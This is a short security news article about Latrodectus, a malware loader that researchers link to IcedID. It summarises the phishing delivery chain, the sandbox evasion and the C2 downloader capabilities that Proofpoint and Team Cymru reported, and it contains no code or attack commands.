A recently discovered malware named Latrodectus is believed to be an advanced version of the IcedID loader, which has been causing trouble in malicious email campaigns since November 2023.
Researchers from Proofpoint and Team Cymru uncovered this new threat, noting that its capabilities are still experimental and not fully stable.
IcedID, initially identified in 2017 as a banking trojan, evolved over time to become a sophisticated loader that can deliver various types of malware, including ransomware, to infected systems.
In February 2024, a key figure in the IcedID operation pleaded guilty in the United States, facing a lengthy prison sentence. Now, researchers speculate that the creators of IcedID developed Latrodectus due to shared infrastructure and operational similarities.
Although it's too early to say whether Latrodectus will replace IcedID, initial findings indicate that threat actors previously associated with IcedID are now increasingly using Latrodectus in their phishing campaigns. Latrodectus first appeared in November 2023, with a noticeable uptick in deployments in February and March 2024. Threat actors initiate attacks by sending fake copyright infringement notices via online contact forms to targeted organizations.
These phishing emails can be alarming to recipients, potentially leading them to click on embedded links. In the latest campaigns, victims are directed to a Google Firebase URL, which drops a JavaScript file. Upon execution, the JS file uses Windows installer to run an MSI file containing the Latrodectus DLL payload from a WebDAV share.
Unlike IcedID, Latrodectus performs various sandbox evasion checks before running on a device, making it harder for security researchers to detect and analyze.
After initialization, Latrodectus communicates with its operators and acts as a downloader for further malicious payloads, based on commands received from a command and control (C2) server.
The malware supports various commands, including retrieving file names, obtaining a list of running processes, executing files, and downloading additional payloads.
Latrodectus operates with a dynamic infrastructure approach, with most new C2 servers coming online towards the end of the week before attacks.
Proofpoint warns of the high probability of Latrodectus being utilized by multiple threat actors in the future, especially those previously associated with IcedID. Vigilance and updated security measures are crucial to mitigate this emerging threat.
0 comments:
Post a Comment